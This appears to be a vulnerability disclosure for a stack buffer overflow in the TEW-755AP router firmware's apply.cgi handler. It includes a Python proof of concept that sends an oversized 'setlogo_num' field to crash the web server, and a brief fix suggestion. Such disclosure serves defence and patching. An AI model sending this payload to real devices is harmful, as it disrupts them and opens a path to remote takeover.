We found a stack buffer overflow vulnerability at **TEW-755AP (**Firmware version TEW755AP-FW113B01.bin).

Untitled

In the handler function for action icp_setlogo_img (sub_41DBF4) of the file /www/cgi/ssi, the value of setlogo_num is directly copied to stack buffer without size check. An attacker can specify the input as a very long string in the post data and send the POST Request to apply.cgi to overflow the stack buffer, and finally can perform a Remote Code Execution attack.

PoC

import requests

url = "<http://192.168.17.221:80/apply.cgi>"
cookie = {"Cookie":"uid=1234"}
data = { 
    'action' : "icp_setlogo_img",
    "setlogo_num" : "a" * 0x1000
}
response = requests.post(url, cookies=cookie, data=data)
print(response.text)
print(response)

We use python to send a crafted HTTP post request to the web server, and print out the return message.

Untitled

Send the crafted HTTP request to the server, it will return 502 error code. This is because the stack buffer is overflowed by the input “aaaaaaaaaaaaaaaaaa…”. If it’s a malicious shellcode then the system will be controlled by the attacker.

Fix Suggestion:

Use snprintt to perform avoid buffer overflow